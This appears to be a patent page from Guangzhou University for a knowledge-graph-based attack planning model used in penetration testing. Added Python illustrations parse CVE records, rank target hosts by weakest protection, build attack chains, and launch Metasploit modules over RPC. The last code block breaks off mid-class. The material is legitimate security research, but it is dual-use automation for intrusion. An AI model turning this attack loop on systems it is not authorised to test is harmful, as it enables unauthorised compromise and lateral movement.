A method, device, and medium for constructing a multi-category risk factor attack planning model.

By constructing a multi-category risk factor attack planning model, the problem of existing technologies being unable to effectively perceive uncertain environments and integrate multiple categories of risk factors is solved. This enables multi-category risk assessment and modeling in uncertain environments, improving the effectiveness and comprehensiveness of penetration testing.

CN116961985B · Active · Publication Date: 2026-06-30 · GUANGZHOU UNIVERSITY

Patent Information

Authority / Receiving Office: CN · China
Patent Type: Patents (China)
Current Assignee / Owner: GUANGZHOU UNIVERSITY
Filing Date: 2023-04-19
Publication Date: 2026-06-30

AI Technical Summary

Technical Problem

Existing attack planning models cannot effectively perceive uncertain environments in black-box environments, are prone to getting trapped in local minima in white-box environments, and lack methods to integrate multiple risk factors, making it impossible to comprehensively investigate system vulnerabilities.

Method used

A multi-category risk factor attack planning model is constructed. By acquiring multi-category risk factors, an attack planning knowledge graph is established to form an attack factor chain. The model is optimized through feedback information, and a priority algorithm is used to assess the vulnerabilities of the target asset. The attack is carried out in conjunction with the Metasploit tool, and the model is updated.

Benefits of technology

It enables the assessment and modeling of multiple risk factors in uncertain environments, integrates multiple risk factors, optimizes attack planning models, and improves the effectiveness and comprehensiveness of penetration testing.

✦ Generated by Eureka AI based on patent content.


Abstract

This invention discloses a method, device, and medium for constructing a multi-category risk element attack planning model, comprising the following steps: acquiring multi-category risk elements and establishing an attack planning knowledge graph; selecting risk elements from the attack planning knowledge graph based on the physical characteristics of the target asset to form an attack element chain; loading the attack element chain into the attack planning model to attack the target asset; and optimizing the attack planning model based on feedback information from the target asset after the attack. This invention constructs a knowledge graph from an attack perspective, fully considering entity elements in penetration testing scenarios during ontology construction, effectively integrating multi-category risk elements, and effectively evaluating and modeling multi-category risk elements in uncertain environments. This invention can also integrate effective feedback information generated during the attack process into the attack planning model, using network security attack and defense elements in the scenario for autonomous attack reasoning, and incorporating feedback information into the next attack planning decision.

Description

[0001] Technical Field

[0002] This invention relates to the field of network security technology, and in particular to a method, device, and medium for constructing a multi-category risk factor attack planning model.

Background Technology

[0003] In today's information society, the security threats facing the Internet increase day by day, and the emergence of advanced persistent threats (APTs) has made the security situation in cyberspace more severe. Attackers constantly target the information systems of enterprises and organizations through various means, stealing sensitive information and causing great losses. Ensuring information security has therefore become an important task for modern enterprises and organizations.

[0004] Penetration testing is commonly used to test the security level of information systems. Penetration testing involves simulating hacker attacks, establishing an attack plan model, and then launching an attack on the target information system to test its security capabilities and discover potential vulnerabilities.

[0005] Some existing attack planning models cannot effectively perceive an uncertain environment in black-box settings, while models suited to white-box settings, such as Markov decision process models, are prone to getting trapped in local minima and cannot comprehensively identify system vulnerabilities. Moreover, in a dynamic and complex cyberspace in which security-related information comes from many sources, is abundant, and changes rapidly, existing attack planning model construction methods lack an effective way to integrate multiple categories of risk elements. There is currently no attack planning model that both integrates multiple categories of risk elements and adapts to uncertain environments.

Summary of the Invention

[0006] In view of this, embodiments of the present invention provide a method, device and medium for constructing a multi-category risk factor attack planning model.

[0007] The first aspect of this invention provides a method for constructing a multi-category risk factor attack planning model, comprising the following steps:

[0008] Acquire multi-category risk elements and build an attack planning knowledge graph;

[0009] Based on the physical characteristics of the target asset, risk elements are selected from the attack planning knowledge graph to form an attack element chain;

[0010] The attack element chain is loaded into the attack planning model to attack the target asset;

[0011] The attack planning model is optimized based on feedback information from the target asset after the attack.

[0012] Furthermore, the acquisition of multi-category risk factors specifically includes a combination of automated acquisition and manual annotation. Automated acquisition is achieved by using web crawler scripts to automatically crawl attribute data as risk factor entities in open-source datasets. After acquiring the risk factors, the relationships between the risk factors are manually annotated.

[0013] Furthermore, the risk element entities include vulnerability elements, attack elements, tool elements, static asset elements, and dynamic asset elements;

[0014] The relationships among the risk elements include:

[0015] a dynamic asset element is associated with static asset elements;

[0016] a static asset element has vulnerability elements;

[0017] an attack element is associated with tool elements;

[0018] a tool element exploits a vulnerability element to act on a dynamic asset element;

[0019] a dynamic asset element implements attack elements.

[0020] Furthermore, the step of selecting risk elements from the attack planning knowledge graph based on the physical characteristics of the target asset specifically includes the following steps:

[0021] Analyze the protection strength of the target asset across various dimensions; wherein, the dimensions of the target asset include asset dimension, configuration dimension, and protection dimension;

[0022] A priority algorithm is used to evaluate the dimensions and identify the target asset dimension with the lowest protection strength; the risk elements corresponding to that dimension are then extracted from the knowledge graph to form an attack element chain.

[0023] Furthermore, the resulting attack element chain includes dynamic asset elements, attack elements associated with dynamic asset elements, tool elements associated with attack elements, vulnerability elements associated with tool elements, and static asset elements associated with vulnerability elements.

[0024] Furthermore, the attack on the target asset specifically includes the following steps:

[0025] Initialize dynamic asset elements to form a network topology;

[0026] Query the static asset elements associated with the dynamic asset elements to obtain the attack elements that can be executed by the dynamic asset elements;

[0027] Based on the executable attack elements of dynamic asset elements, query the tool elements associated with the attack elements;

[0028] Query the sub-tools associated with the tool element; if any exist, further query the tool elements of the sub-tools.

[0029] Use the aforementioned tool-type elements to attack the target asset.

[0030] Furthermore, optimizing the attack planning model based on feedback information from the target asset after the attack specifically includes the following steps:

[0031] Collect feedback information generated after the attack planning model attacks the target assets;

[0032] When the feedback information is a vulnerability in the target asset, query the static asset elements that have the vulnerability element, and update the vulnerability element on the dynamic asset elements in the attack element chain.

[0033] When the feedback information is attribute information of the target asset itself, the attribute information of the target asset itself is directly updated on the dynamic asset class elements in the attack element chain.

[0034] Furthermore, when the attack planning model attacks the target asset but does not generate new feedback information, the attack operation ends, and the optimization of the attack planning model is completed.

[0035] A second aspect of the present invention discloses an electronic device, including a processor and a memory;

[0036] The memory is used to store programs;

[0037] The processor executes the program to implement a method for constructing a multi-category risk factor attack planning model.

[0038] The third aspect of the present invention discloses a computer-readable storage medium storing a program that is executed by a processor to implement a method for constructing a multi-category risk factor attack planning model.

[0039] The embodiments of the present invention have the following beneficial effects: The method, device, and medium for constructing a multi-category risk factor attack planning model disclosed in the present invention construct a knowledge graph from an attack perspective, fully consider entity elements in penetration testing scenarios during ontology construction, effectively integrate multi-category risk factors, and effectively evaluate and model multi-category risk factors in uncertain environments. The present invention can also integrate effective feedback information generated during the attack process into the attack planning model, utilize network security attack and defense elements in the scenario for autonomous attack reasoning, and incorporate feedback information into the next attack planning decision.

[0040] Additional aspects and advantages of the invention will be set forth in the description that follows, and in part will be obvious from the description or may be learned by practice of the invention.

Description of the Drawings

[0041] To more clearly illustrate the technical solutions in the embodiments of this application, the accompanying drawings used in the description of the embodiments will be briefly introduced below. Obviously, the accompanying drawings described below are only some embodiments of this application. For those skilled in the art, other drawings can be obtained based on these drawings without creative effort.

[0042] Figure 1 is a basic implementation flowchart of the method, device, and medium for constructing a multi-category risk factor attack planning model of the present invention;

[0043] Figure 2 is a flowchart of the knowledge graph construction process of the method, device, and medium for constructing a multi-category risk factor attack planning model of the present invention;

[0044] Figure 3 is a schematic diagram of the internal relationships of the knowledge graph of the method, device, and medium for constructing a multi-category risk factor attack planning model of the present invention;

[0045] Figure 4 is a network topology diagram of the method, device, and medium for constructing a multi-category risk element attack planning model of the present invention;

[0046] Figure 5 is a schematic diagram of the attack element chain of the method, device, and medium for constructing a multi-category risk element attack planning model of the present invention;

[0047] Figure 6 is an attack planning flowchart of the method, device, and medium for constructing a multi-category risk factor attack planning model of the present invention.

Detailed Description

[0048] To make the objectives, technical solutions, and advantages of this application clearer, the following detailed description is provided in conjunction with the accompanying drawings and embodiments. It should be understood that the specific embodiments described herein are merely illustrative and not intended to limit the scope of this application.

[0049] As noted above, existing penetration testing techniques operating in a black-box environment cannot effectively perceive uncertain environments, while attack planning models suited to white-box environments, such as Markov decision process models, are prone to getting trapped in local minima and fail to identify system vulnerabilities comprehensively. Furthermore, in a dynamic and complex cyberspace where security-related information is diverse, abundant, and rapidly changing, existing attack planning model construction methods lack an effective way to integrate multiple categories of risk elements. No existing attack planning model both integrates multiple categories of risk elements and adapts to uncertain environments.

[0050] To address this, embodiments of the present invention provide a method for constructing a multi-category risk factor attack planning model, aiming to solve the following problems:

[0051] ① In a black-box environment, effectively assess and model multiple categories of risk elements under uncertain conditions;

[0052] ② Integrate the effective feedback information generated during the attack process into the attack planning model;

[0053] ③ Automatically build an attack planning knowledge base from the knowledge and procedures that experts acquire in manual attack planning;

[0054] ④ Establish an effective link between the attack planning model and the actual asset system.

[0055] This invention provides a method for constructing a multi-category risk factor attack planning model which, as shown in Figure 1, includes the following steps:

[0056] S100. Acquire multiple risk factors and establish an attack planning knowledge graph;

[0057] S200. Select risk elements from the attack planning knowledge graph based on the physical characteristics of the target asset to form an attack element chain;

[0058] S300. Load the attack element chain into the attack planning model to attack the target asset;

[0059] S400. Optimize the attack planning model based on feedback information from the target asset after the attack.

[0060] The implementation process of each step in the embodiments of the present invention is described in detail below:

[0061] S100. Acquire multiple risk factors and establish an attack planning knowledge graph.

[0062] The embodiments of this invention adopt a top-down construction approach. Based on the network security elements involved in the attack scenario, such as attack techniques and tactics, exploit vulnerabilities, attack tools, target asset configuration information, topology information, etc., a network security ontology model from the attack perspective is constructed. Then, corresponding knowledge is extracted and relationships are constructed from open source datasets. After quality assessment, the knowledge graph is finally stored in a graph database.

[0063] As shown in Figure 2, step S100 acquires multiple categories of risk elements through a combination of automated acquisition and manual annotation. Automated acquisition uses web crawler scripts to extract attribute data from open-source datasets as risk element entities; after the risk elements are acquired, the relationships between them are annotated manually. The open-source datasets used in this invention are the Common Platform Enumeration (CPE) dictionary, the Common Vulnerabilities and Exposures (CVE) database, and the MITRE ATT&CK knowledge base. The risk elements are crawled automatically with a web crawling framework such as Scrapy, and the relationships between them are annotated manually on the basis of expert experience.

[0064] As shown in Figure 3, the risk element entities fall into five categories: vulnerability elements, attack elements, tool elements, static asset elements, and dynamic asset elements.

[0065] The relationships between risk factors include:

[0066] Dynamic asset elements are associated with static asset elements; static asset elements have vulnerability elements; attack elements are associated with tool elements; tool elements exploit vulnerability elements to act on dynamic asset elements; dynamic asset elements implement attack elements.

[0067] The following section details the attribute information of the entities involved in various risk factors.

[0068] The attributes of vulnerability-type elements include vulnerability name, vulnerability impact level, a list of related attack-type element names, and an additional description of the vulnerability. Each vulnerability element entity in a vulnerability-type element category has these four attributes.

[0069] Specifically, the "vulnerability name" identifies the vulnerability in the vulnerability dataset, for example by its CVE identifier, and is the value used in the lists of associated vulnerability names carried by other elements.

[0070] "Vulnerability impact level" represents the degree of impact of the vulnerability entity; the standard follows the Common Vulnerability Scoring System (CVSS), and the value is used by the subsequent priority evaluation algorithm;

[0071] The "list of associated attack element names" consists of "attack name" attribute values of attack elements and is used to associate attack element entities.

[0072] The "Additional Description of the Vulnerability" section describes the specific significance of the vulnerability element entity, facilitating manual analysis by experts.

[0073] The attributes of attack-type elements include the attack name, a list of related tool-type element names, a list of related vulnerability-type element names, a list of related dynamic asset-type element names, and an additional description of the attack. Each attack element entity in an attack-type element set has these five attributes.

[0074] Specifically, the "attack name" is used to identify attack techniques and tactics;

[0075] The "list of associated tool element names" consists of "tool name" attribute values of tool elements and is used to associate tool element entities.

[0076] The “List of Associated Vulnerability Category Element Names” consists of a set of “Vulnerability Name” attributes for vulnerability category elements and is used to associate vulnerability element entities.

[0077] The “List of Associated Dynamic Asset Element Names” consists of the “Asset IP” attribute set of dynamic asset elements and is used to associate dynamic asset element entities.

[0078] The "Additional Description of the Attack" section describes the specific meaning of the attack element entities, facilitating manual analysis by experts.

[0079] The attributes of a tool-type element include tool name, tool type, tool usage, a list of associated sub-tool names, attack tool result type, attack result, and an additional description of the attack tool. Each tool element entity within a tool-type element includes these seven attributes.

[0080] Specifically, the "tool name" is used to identify the specific attack tool;

[0081] "Tool type" takes one of two values, "tool attack" and "associated attack": the former means the tool element entity can complete the attack on its own without sub-tools, while the latter means that when the tool entity is queried, its associated sub-tools must be queried as well.

[0082] "Tool Usage" consists of standardized tool invocation commands based on Metasploit, used to invoke attack tools;

[0083] The “List of Associated Sub-Tool Names” consists of the “Tool Names” of the tool category elements and is used to associate sub-tools.

[0084] "Attack tool result type" takes one of two values, "asset" and "vulnerability": for the former, the attack result is used to update the dynamic asset element entity; for the latter, the attack result is used to query the vulnerability element entity.

[0085] "Attack Results" is used to store the actual execution results of the attack tools;

[0086] The "Additional Description of the Attack Tool" section describes the specific meaning of the tool entity, facilitating manual analysis by experts.

[0087] The attributes of static asset elements include asset name, asset type, vendor name, product name, version number, a list of vulnerability names associated with the host asset, update package information, version information, and additional description of the asset. Each static asset element entity in the static asset category includes these nine attributes.

[0088] Static asset attributes are mostly used to characterize information about the target asset, such as vendor name and version number. Specifically, the "List of Vulnerability Names Associated with Host Assets" consists of the "Vulnerability Names" of the vulnerability category elements.

[0089] The attributes of dynamic asset elements include asset IP, a list of associated asset IPs, domain name, open ports, configuration information, security measures, asset type, product name, and version number. Each dynamic asset element entity within the dynamic asset category includes these nine attributes.

[0090] Specifically, "asset IP" is used to identify the IP address of the target asset obtained during the attack;

[0091] The "list of associated asset IPs" is the set of asset IPs reachable from this asset. As shown in Figure 4, this attribute lets dynamic asset element entities be connected in the graph through network reachability relationships, so that the network topology of the controlled target assets is mapped automatically as new dynamic asset element entities are generated, including whether a host has a path out of the network. In the figure, for example, controlled host 192.168.1.2 in the first-layer intranet is an out-of-network host (one with a path out of the network), while 192.168.1.3 is an in-network host; this distinction supports the subsequent attack planning and reasoning process.

[0092] "Domain name" is used to identify the domain name address corresponding to the target asset;

[0093] "Open ports" consist of the set of port numbers obtained during the host scanning process;

[0094] "Configuration information" is used to identify inappropriate configuration information of the target asset, such as leaked user credentials;

[0095] "Security measures" identifies the protective information of the target asset, such as the WAF model.
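As an added illustration (not code from the patent), the following Python maps a CPE 2.3 formatted string onto the static asset attributes above and an NVD-style CVE record onto the four vulnerability attributes, with the affected CPEs becoming the static assets that have the vulnerability. The record layout follows the NVD API 2.0 JSON shape as assumed here, the sample record is constructed rather than fetched, and the CWE-to-attack-name table stands in for the expert annotation the patent describes; none of these names come from the patent.

```python
import re

# Assumed mapping from CWE ids (as listed in NVD records) to the attack element names used in
# the graph; the patent annotates vulnerability-to-attack relationships manually, this table stands in.
CWE_TO_ATTACK = {"CWE-502": "deserialization-rce", "CWE-89": "sql-injection"}

CPE_PART = {"a": "application", "o": "operating-system", "h": "hardware"}


def parse_cpe(cpe):
    """CPE 2.3 formatted string -> static asset attributes (vendor, product, version, asset type)."""
    fields = re.split(r"(?<!\\):", cpe)          # split on colons that are not escaped
    if len(fields) != 13 or fields[:2] != ["cpe", "2.3"]:
        raise ValueError(f"not a CPE 2.3 formatted string: {cpe!r}")
    part, vendor, product, version = (f.replace("\\:", ":") for f in fields[2:6])
    version = None if version in ("*", "-") else version
    return {"asset_type": CPE_PART.get(part, part), "vendor": vendor, "product": product,
            "version": version, "asset_name": f"{vendor}-{product}-{version or 'any'}"}


def vulnerability_entity(record):
    """NVD API 2.0 style CVE record (assumed shape) -> the four vulnerability attributes."""
    cve = record["cve"]
    metrics = cve.get("metrics", {})
    scored = metrics.get("cvssMetricV31") or metrics.get("cvssMetricV30") or []
    impact = scored[0]["cvssData"]["baseScore"] if scored else None   # CVSS base score
    cwes = {d["value"] for w in cve.get("weaknesses", []) for d in w["description"]}
    attacks = sorted(CWE_TO_ATTACK[c] for c in cwes if c in CWE_TO_ATTACK)
    desc = next((d["value"] for d in cve.get("descriptions", []) if d["lang"] == "en"), "")
    return {"name": cve["id"], "impact": impact, "related_attacks": attacks, "description": desc}


def static_assets_from_cve(record):
    """Vulnerable CPEs in a record become the static asset entities that HAVE this vulnerability."""
    cve = record["cve"]
    cpes = [m["criteria"] for cfg in cve.get("configurations", [])
            for node in cfg["nodes"] for m in node["cpeMatch"] if m.get("vulnerable")]
    return [parse_cpe(c) for c in cpes]


# Constructed sample record in the NVD API 2.0 layout (abridged, not fetched from NVD).
SAMPLE_RECORD = {"cve": {
    "id": "CVE-2016-4437",
    "descriptions": [{"lang": "en", "value": "(constructed) rememberMe cookie deserialization in Apache Shiro"}],
    "metrics": {"cvssMetricV31": [{"cvssData": {"baseScore": 9.8, "baseSeverity": "CRITICAL"}}]},
    "weaknesses": [{"description": [{"lang": "en", "value": "CWE-502"}]}],
    "configurations": [{"nodes": [{"cpeMatch": [
        {"vulnerable": True, "criteria": "cpe:2.3:a:apache:shiro:1.2.4:*:*:*:*:*:*:*"}]}]}],
}}
```

The CPE parser rejects the older `cpe:/` URI binding rather than guessing at it, and a record with no CVSS v3 metric yields `impact = None` so the priority algorithm can treat unscored vulnerabilities explicitly instead of silently scoring them zero.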

[0096] S200. Select risk elements from the attack planning knowledge graph based on the physical characteristics of the target asset to form an attack element chain;

[0097] S300. Load the attack element chain into the attack planning model to attack the target asset;

[0098] The overall attack planning framework for steps S200 to S300 is shown in Figure 6. Selecting risk elements from the attack planning knowledge graph based on the physical characteristics of the target asset specifically includes the following steps:

[0099] S201. Analyze the protection strength of the target asset across various dimensions; where the dimensions of the target asset include asset dimension, configuration dimension, and protection dimension;

[0100] S202. A priority algorithm is used to evaluate the dimensions and identify the target asset dimension with the lowest protection strength; the risk elements corresponding to that dimension are then extracted from the knowledge graph to form an attack element chain.

[0101] This embodiment addresses the problem of too many dimensions of target assets in attack planning by fully utilizing the "weakest link" effect of target asset security protection. It uses a priority evaluation algorithm to identify the vulnerabilities of target assets from the asset, configuration, and protection dimensions, providing quantitative support for the construction of the attack element chain.

[0102] In this embodiment, the asset dimension refers to assets with a large number of historical vulnerabilities, such as Shiro, Weblogic, WordPress, and open-source CMS, or assets with high attack potential, such as firewalls, VPNs, and centralized control devices; the configuration dimension refers to the amount of inappropriate configuration information existing in the target asset, such as error messages for different payloads, sensitive backend paths, and source code leaks; the protection dimension refers to the level of protection of the target asset, such as whether it is protected by a WAF or whether antivirus software is running.

[0103] In step S200 of this embodiment, during the dynamic query of the knowledge graph, the priority evaluation algorithm first evaluates all dynamic asset entities. Assets with more vulnerabilities, weaker protection, and higher attack reward are queried for attack entities first, and the attack element chain in the knowledge graph (Figure 6) is then constructed. The attack element chain is composed, according to the association rules, of the five types of entity nodes in the knowledge graph: dynamic assets, static assets, attacks, tools, and vulnerabilities.
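The patent names the asset, configuration and protection dimensions but gives no scoring formula. The following added Python (not the patent's own algorithm) is one concrete priority evaluation consistent with the description: each dimension gets an exposure score, the weakest dimension of an asset is the one with the highest exposure, and assets are ordered so that the most exposed one is queried first. The weights, the asset-type lists and the sample hosts are assumptions; the CVSS values are the NVD v3.x base scores of the named CVEs.

```python
from dataclasses import dataclass, field

# The patent names the three dimensions but gives no formula, so the weights and asset-type lists
# below are assumptions chosen to illustrate the "weakest link" selection of S202.
HIGH_REWARD_TYPES = {"firewall", "vpn", "centralized-control"}   # high attack potential
VULN_PRONE_TYPES = {"shiro", "weblogic", "wordpress", "cms"}       # many historical vulnerabilities
W_REWARD, W_VULN_PRONE, W_MISCONFIG, W_PROTECTION = 5.0, 2.0, 3.0, 4.0


@dataclass
class DynamicAsset:
    ip: str
    asset_type: str
    vulns: dict = field(default_factory=dict)        # vulnerability name -> CVSS base score
    misconfigs: list = field(default_factory=list)   # e.g. verbose errors, exposed admin path
    protections: list = field(default_factory=list)  # e.g. "waf", "antivirus"


def dimension_exposure(a):
    """Exposure score per dimension; a higher score means weaker protection in that dimension."""
    asset = sum(a.vulns.values())
    asset += W_REWARD if a.asset_type in HIGH_REWARD_TYPES else 0.0
    asset += W_VULN_PRONE if a.asset_type in VULN_PRONE_TYPES else 0.0
    configuration = W_MISCONFIG * len(a.misconfigs)
    protection = max(0.0, 10.0 - W_PROTECTION * len(a.protections))
    return {"asset": asset, "configuration": configuration, "protection": protection}


def weakest_dimension(a):
    """S202: the dimension of this asset with the lowest protection strength (highest exposure)."""
    scores = dimension_exposure(a)
    return max(scores, key=scores.get)


def prioritize(assets):
    """Order dynamic asset entities so the most exposed one is attacked first; ties break on IP."""
    return sorted(assets, key=lambda a: (-sum(dimension_exposure(a).values()), a.ip))


# Constructed sample assets; the CVSS values are NVD v3.x base scores of the named CVEs.
SAMPLE_ASSETS = [
    DynamicAsset("192.168.1.1", "firewall", {"CVE-2014-0160": 7.5}, [], ["waf", "antivirus"]),
    DynamicAsset("192.168.1.3", "shiro", {"CVE-2016-4437": 9.8},
                 ["verbose-error-pages", "exposed-admin-path"], []),
    DynamicAsset("192.168.1.20", "workstation", {}, ["leaked-credentials"], ["antivirus"]),
]
```

The point to keep from the patent is that the dimension scores are used twice: once across assets to pick which dynamic asset entity is queried first, and once within the chosen asset to decide which dimension's risk elements are pulled from the graph. Any real deployment would calibrate the weights against its own engagement data.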

[0104] Step S300 involves attacking the target asset, specifically including the following steps:

[0105] S301. Initialize dynamic asset elements to form a network topology;

[0106] S302. Query the static asset elements associated with the dynamic asset elements to obtain the attack elements that can be executed by the dynamic asset elements;

[0107] S303. Based on the executable attack elements of dynamic asset elements, query the tool elements associated with the attack elements;

[0108] S304. Query the sub-tools associated with the tool element; if any exist, further query the tool elements of the sub-tools.

[0109] S305. Use tool-type elements to attack target assets.

[0110] In step S300 of this embodiment, when the attack begins, the dynamic asset element entity is first initialized, which only contains the attack node. New dynamic asset element entities are dynamically added as the target host gains permissions, forming a network topology. When there are multiple attack paths, a priority evaluation algorithm is called to select the optimal attack path. Then, by querying its associated attack element entity, the attack strategy that can be executed on the current dynamic asset element entity can be obtained. Next, according to each attack strategy, its associated tool element entity is queried, and the associated tool element entity is applied to attack the target asset.

[0111] S400. Optimize the attack planning model based on feedback information from the target asset after the attack.

[0112] In this embodiment, step S400 optimizes the attack planning model based on feedback information from the target asset after the attack, specifically including the following steps:

[0113] S401. Collect feedback information generated after the attack planning model attacks the target asset;

[0114] S402. When the feedback information is a vulnerability in the target asset, query the static asset elements with vulnerability elements and update the vulnerability elements on the dynamic asset elements in the attack element chain.

[0115] S403. When the feedback information is the attribute information of the target asset itself, directly update the attribute information of the target asset itself on the dynamic asset class elements in the attack element chain.

[0116] After an attack is launched on a target asset, the asset returns feedback information that reflects the effect of the attack. This feedback falls into two types: vulnerability type and asset type. Vulnerability-type feedback names a vulnerability entity present in the target asset; the attack planning model queries that vulnerability entity and its associated static asset entity and updates the dynamic asset entity accordingly. Asset-type feedback reports problems with the target asset itself, such as granted permissions or resource configuration; the attack planning model updates the dynamic asset entity directly.

[0117] Each round of attack generates a local attack element chain (local attack plan). When the attack no longer generates new feedback information, it is considered to be the end of the attack, and the generation of new attack plans stops, thus completing the optimization of the attack planning model.
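As an added worked example, not the patent's implementation, the following Python models the five entity types and their relationships in a small in-memory graph (a stand-in for the graph database), walks it to build the attack element chain (S302 to S304, including sub-tool expansion), replaces the Metasploit call of S305 with a constructed response table, folds both kinds of feedback back into the dynamic asset (S402 and S403), grows the topology when new associated IPs appear, and stops when a round yields no new feedback as in [0117]. Node ids, the relation names ASSOCIATED_WITH, HAS_VULN, USES_TOOL, HAS_SUBTOOL and REACHES, the attribute names and the sample Shiro host are all assumptions; CVE-2016-4437 is a real Shiro deserialization CVE used only as sample data.

```python
from collections import defaultdict


class AttackGraph:
    """In-memory stand-in for the graph database (node ids and relation names are assumptions)."""
    def __init__(self):
        self.nodes = {}                  # node id -> {"type": ..., attribute: value, ...}
        self.edges = defaultdict(set)    # (src id, relation) -> {dst id, ...}

    def add(self, node_id, ntype, **attrs):
        self.nodes[node_id] = {"type": ntype, **attrs}

    def add_dynamic_asset(self, ip, **attrs):
        base = dict(ip=ip, associated_ips=[], open_ports=[], vulns=[], config=[], protections=[])
        self.add(ip, "dynamic_asset", **{**base, **attrs})

    def relate(self, src, relation, dst):
        self.edges[(src, relation)].add(dst)

    def out(self, src, relation):
        return sorted(self.edges[(src, relation)])

    def nodes_of(self, ntype):
        return sorted(n for n, a in self.nodes.items() if a["type"] == ntype)


def expand_tool(g, tool):  # S304: an 'associated' tool only names sub-tools; recurse to concrete tools
    if g.nodes[tool]["tool_type"] == "tool":
        return [tool]
    return [t for sub in g.out(tool, "HAS_SUBTOOL") for t in expand_tool(g, sub)]


def attack_element_chain(g, dyn_asset):  # S302-S304: dynamic asset -> static -> vuln -> attack -> tool
    return [(dyn_asset, attack, tool, vuln, static)
            for static in g.out(dyn_asset, "ASSOCIATED_WITH")
            for vuln in g.out(static, "HAS_VULN")
            for attack in g.nodes[vuln]["related_attacks"]
            for kit in g.out(attack, "USES_TOOL")
            for tool in expand_tool(g, kit)]


def apply_feedback(g, dyn_asset, result_type, result):
    """S402/S403: fold one tool result into the dynamic asset; True if something new was learned."""
    node = g.nodes[dyn_asset]
    if result_type == "vulnerability":
        # S402: accept only vulnerabilities that some static asset in the graph actually HAS
        known = any(result in g.out(s, "HAS_VULN") for s in g.nodes_of("static_asset"))
        if not known or result in node["vulns"]:
            return False
        node["vulns"].append(result)
        return True
    changed = False   # S403: asset-type feedback is written straight onto the attributes
    for key, values in result.items():
        for value in values:
            if value in node[key]:
                continue
            node[key].append(value)
            changed = True
            if key == "associated_ips" and value not in g.nodes:   # new reachable host: grow topology
                g.add_dynamic_asset(value)
                g.relate(dyn_asset, "REACHES", value)
    return changed


def campaign(g, responses, max_rounds=10):
    """Rounds of: build local chains, run tools, absorb feedback; stop when nothing new ([0117])."""
    rounds = []
    for _ in range(max_rounds):
        changed, chains = False, {}
        for dyn_asset in g.nodes_of("dynamic_asset"):
            chains[dyn_asset] = attack_element_chain(g, dyn_asset)
            for _, _, tool, _, _ in chains[dyn_asset]:
                # S305 stand-in: the constructed `responses` table answers instead of Metasploit
                result = g.nodes[tool]["attack_result"] = responses.get((tool, dyn_asset))
                if result is not None:
                    changed |= apply_feedback(g, dyn_asset, g.nodes[tool]["result_type"], result)
        rounds.append(chains)
        if not changed:
            break
    return rounds


def build_sample_graph():  # constructed sample: at S301 the attacker already knows one Shiro host
    g = AttackGraph()
    g.add("CVE-2016-4437", "vulnerability", impact=9.8, related_attacks=["deserialization-rce"])
    g.add("apache-shiro-1.2.4", "static_asset", vendor="apache", product="shiro", version="1.2.4")
    g.add("deserialization-rce", "attack")
    g.add("shiro-rce-kit", "tool", tool_type="associated", result_type=None)
    g.add("exploit-shiro-rememberme", "tool", tool_type="tool", result_type="vulnerability")
    g.add("post-dump-routes", "tool", tool_type="tool", result_type="asset")
    g.relate("apache-shiro-1.2.4", "HAS_VULN", "CVE-2016-4437")
    g.relate("deserialization-rce", "USES_TOOL", "shiro-rce-kit")
    g.relate("shiro-rce-kit", "HAS_SUBTOOL", "exploit-shiro-rememberme")
    g.relate("shiro-rce-kit", "HAS_SUBTOOL", "post-dump-routes")
    g.add_dynamic_asset("192.168.1.3", open_ports=[8080])
    g.relate("192.168.1.3", "ASSOCIATED_WITH", "apache-shiro-1.2.4")
    return g


SAMPLE_RESPONSES = {  # constructed target behaviour: what each tool reports against each host
    ("exploit-shiro-rememberme", "192.168.1.3"): "CVE-2016-4437",
    ("post-dump-routes", "192.168.1.3"): {"associated_ips": ["10.10.0.7"], "open_ports": [22]},
}
```

Running `campaign(build_sample_graph(), SAMPLE_RESPONSES)` takes two rounds: the first confirms the vulnerability, learns a new port and discovers 10.10.0.7 (which becomes a new dynamic asset reachable from the Shiro host); the second finds nothing new and ends the attack. The S402 check matters in practice: a tool reporting a vulnerability name that no static asset in the graph carries is treated as noise rather than written onto the asset, which is what keeps a flaky exploit result from steering the next round.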

[0118] In this embodiment, the attack planning model is built on the open-source Python library pymetasploit3, which standardizes the functionality of each module of the Metasploit penetration testing framework. The framework is invoked remotely over RPC, so the attack planning model can operate Metasploit's exploit, payload, auxiliary, and encoder modules without going through the console. Relevant tool parameters are stored as tool entity attributes in the knowledge graph and updated in real time as tools are invoked.
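The patent stores each tool's "tool usage" as a standardized Metasploit invocation and drives the framework over RPC with pymetasploit3. The added Python below, which is not the patent's code, assumes that the usage attribute holds msfconsole-style lines (`use`, `set`, `run`/`exploit`), parses them into a module, its options and a payload, and dispatches through a client that exposes pymetasploit3's `modules.use` / option assignment / `execute` interface. A recording fake client is included so the block runs offline; `connect` builds the real `MsfRpcClient` against a running msfrpcd and is only called when you need it. The vsftpd and portscan module paths in the sample usage strings are real Metasploit modules; the target hosts are constructed.

```python
import shlex


class ToolInvocation:
    """What one standardized 'tool usage' attribute resolves to."""
    def __init__(self, module_type, module_name, options, payload):
        self.module_type, self.module_name = module_type, module_name
        self.options, self.payload = options, payload


def parse_usage(usage):
    """msfconsole-style lines -> ToolInvocation (assumed format: use / set / run|exploit)."""
    module_type = module_name = payload = None
    options, armed = {}, False
    for raw in usage.strip().splitlines():
        words = shlex.split(raw)
        if not words:
            continue
        cmd, args = words[0].lower(), words[1:]
        if cmd == "use" and len(args) == 1 and "/" in args[0]:
            module_type, module_name = args[0].split("/", 1)
        elif cmd == "set" and len(args) >= 2:
            key, value = args[0].upper(), " ".join(args[1:])
            if key == "PAYLOAD":
                payload = value
            else:
                options[key] = value
        elif cmd in ("run", "exploit") and not args:
            armed = True
        else:   # anything else is rejected: the usage attribute is data, not a shell script
            raise ValueError(f"unsupported line in tool usage: {raw!r}")
    if module_type not in ("exploit", "auxiliary", "post") or not armed:
        raise ValueError("usage must 'use' an exploit/auxiliary/post module and end with run or exploit")
    if module_type == "exploit" and payload is None:
        raise ValueError("an exploit module needs 'set PAYLOAD ...'")
    return ToolInvocation(module_type, module_name, options, payload)


def execute(invocation, client):
    """Drive the module through a pymetasploit3-style client; returns the framework's launch reply."""
    module = client.modules.use(invocation.module_type, invocation.module_name)
    for key, value in invocation.options.items():
        module[key] = value                     # MsfModule validates option names on assignment
    if invocation.payload is not None:
        return module.execute(payload=invocation.payload)
    return module.execute()


def connect(password, host="127.0.0.1", port=55553, ssl=True):
    """Real client: needs pymetasploit3 installed and `msfrpcd -P <password>` running."""
    from pymetasploit3.msfrpc import MsfRpcClient   # imported lazily so the rest runs offline
    return MsfRpcClient(password, server=host, port=port, ssl=ssl)


class FakeModule(dict):
    """Stands in for MsfModule: records option assignments and execute() calls."""
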